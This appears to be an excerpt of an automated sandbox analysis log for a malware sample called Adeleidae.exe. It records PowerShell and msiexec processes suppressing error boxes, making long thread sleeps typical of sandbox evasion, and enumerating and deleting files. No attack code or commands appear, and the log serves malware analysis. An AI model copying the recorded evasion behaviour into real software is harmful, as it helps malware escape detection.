Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599867	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599745	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599640	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599421	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599202	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598874	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598544	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597999	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597124	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596792	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596577	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594609	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6893			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2882			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7548	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -599867s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4008	Thread sleep count: 1258 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4008	Thread sleep count: 8603 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -599745s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -599640s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -599421s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -599202s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -599093s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -598874s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -598765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -598544s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -598218s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -597999s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -597890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -597671s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -597343s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -597234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -597124s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -597015s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -596906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -596792s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -596687s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -596577s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -596468s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -596359s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -596140s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -595921s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -595593s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -595484s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -595375s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -595265s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -595156s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -595046s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -594937s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -594718s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164	Thread sleep time: -594609s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Adeleidae.exe	Code function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405846
Source: C:\Users\user\Desktop\Adeleidae.exe	Code function: 0_2_00406398 FindFirstFileW,FindClose,	0_2_00406398
Source: C:\Users\user\Desktop\Adeleidae.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599867	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599745	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599640	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599421	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599202	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598874	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598544	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597999	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597124	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596792	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596577	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595156	Jump to behavior
